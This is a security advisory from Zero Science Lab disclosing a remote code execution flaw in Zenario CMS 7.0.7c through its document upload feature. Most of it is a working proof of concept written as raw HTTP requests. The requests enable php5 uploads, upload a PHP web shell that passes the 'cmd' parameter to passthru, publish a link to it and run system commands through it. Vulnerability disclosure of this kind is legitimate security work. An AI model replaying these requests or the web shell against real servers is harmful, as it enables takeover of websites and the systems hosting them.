Zenario CMS 7.0.7c Remote Code Execution

`  
Zenario CMS 7.0.7c Remote Code Execution Vulnerability  
  
  
Vendor: Tribal Ltd.  
Product web page: http://www.zenar.io  
Affected version: <= 7.0.7c and 7.1.0 (svn)  
  
Summary: Zenario is a web-based content management system for sites  
with one or many languages. It's designed to grow with your site,  
adding extranet, online database and custom functionality when you  
need it.  
  
Desc: The vulnerability is caused due to the improper verification  
of uploaded files via the Document upload script using 'Filedata' POST  
parameter which allows of arbitrary files being uploaded in '/public/downloads/'  
following a publicaly generated link for access where the admin first  
needs to add the file extension in the allowed list. This can be exploited  
to execute arbitrary PHP code by uploading a malicious PHP script file  
and execute system commands.  
  
Tested on: Ubuntu 14.04 LTS  
PHP 5.5.9-1ubuntu4.1  
Zend Engine v2.5.0  
Zend OPcache v7.0.3  
MySQL/5.5.37  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5280  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5280.php  
  
Vendor: http://zenar.io/zenario-707d  
  
  
27.10.2015  
  
--  
  
  
----------------------  
1. Add php5 file type:  
  
GET http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html#zenario__administration/panels/file_types HTTP/1.1  
  
POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_file_type HTTP/1.1  
Host: 192.168.0.17  
Connection: keep-alive  
Content-Length: 516  
Accept: text/plain, */*; q=0.01  
Origin: http://192.168.0.17  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Referer: http://192.168.0.17/zenario/admin/organizer.php?fromCID=1&fromCType=html  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8  
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35  
  
_save=true&_confirm=&_box={"key":{"id":""},"tabs":{"details":{"edit_mode":{"on":1},"fields":{"type":{"current_value":"php5"},"mime_type":{"current_value":"application/octet-stream"}}}},"_sync":{"cache_dir":"ab_PBtBxW05_mPQDMgpv","password":"/L9HLsICPXzTD93VPn4Ou2Yw6HW6f4CPMFANLol7rcI=","iv":"7XoL6dLYAaMfqXgy7DfOeQ==","session":false}}  
  
  
---------------  
2. Upload file:  
  
POST /zenario/ajax.php?__pluginClassName__=undefined&__path__=zenario_document_upload&method_call=handleAdminBoxAJAX HTTP/1.1  
Host: 192.168.0.17  
Content-Length: 458  
Origin: http://192.168.0.17  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36  
X_FILENAME: phpinfo.php5  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUrDf3o8emcPIM8oD  
Accept: */*  
Referer: http://192.168.0.17/zenario/admin/organizer.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8  
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35  
  
------WebKitFormBoundaryUrDf3o8emcPIM8oD  
Content-Disposition: form-data; name="id"  
  
12  
------WebKitFormBoundaryUrDf3o8emcPIM8oD  
Content-Disposition: form-data; name="fileUpload"  
  
1  
------WebKitFormBoundaryUrDf3o8emcPIM8oD  
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php5"  
Content-Type: application/octet-stream  
  
<?php  
echo "<pre>";  
passthru($_GET['cmd']);  
echo "</pre>";  
?>  
------WebKitFormBoundaryUrDf3o8emcPIM8oD--  
  
  
  
------------------------  
3. Save and verify file:  
  
POST /zenario/admin/ajax.php?_json=1&_ab=1&path=zenario_document_upload&id=12 HTTP/1.1  
Host: 192.168.0.17  
Content-Length: 530  
Accept: text/plain, */*; q=0.01  
Origin: http://192.168.0.17  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Referer: http://192.168.0.17/zenario/admin/organizer.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8  
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35  
  
_save=true&_confirm=&_box={"key":{"id":"12","fileUpload":1},"tabs":{"upload_document":{"edit_mode":{"on":1},"fields":{"document__upload":{"_display_value":"phpinfo.php5","current_value":"~79fa169880192652f933c1834aae09f40c4fc39c~2Fphpinfo.php5"}}}},"_sync":{"cache_dir":"ab_uMwuijj5_YP_0GAuZ","password":"/NUErtsIJtkXJXJqRr0pbt8oqAIUqz0GVdjJung5J/4=","session":false}}  
  
  
------------------------  
3. Generate public link:  
  
POST /zenario/ajax.php?__pluginClassName__=zenario_common_features&__path__=zenario__content/panels/documents&method_call=handleOrganizerPanelAJAX HTTP/1.1  
Host: 192.168.0.17  
Content-Length: 28  
Accept: text/plain, */*; q=0.01  
Origin: http://192.168.0.17  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Referer: http://192.168.0.17/zenario/admin/organizer.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8  
Cookie: __cfduid=dc0db15b5395f7d4726b0bba71b6939621445947596; _ga=GA1.2.1921014116.1445947598; COOKIE_LAST_ADMIN_USER=admin; cookies_accepted=1; PHPSESSID=sf3mce44rpoet5em7a5o6aln35  
  
id=27&generate_public_link=1  
  
  
----------------  
3. Execute code:  
  
GET http://192.168.0.17/zenario/public/downloads/RvoId/phpinfo.php5?cmd=id;pwd HTTP/1.1  
`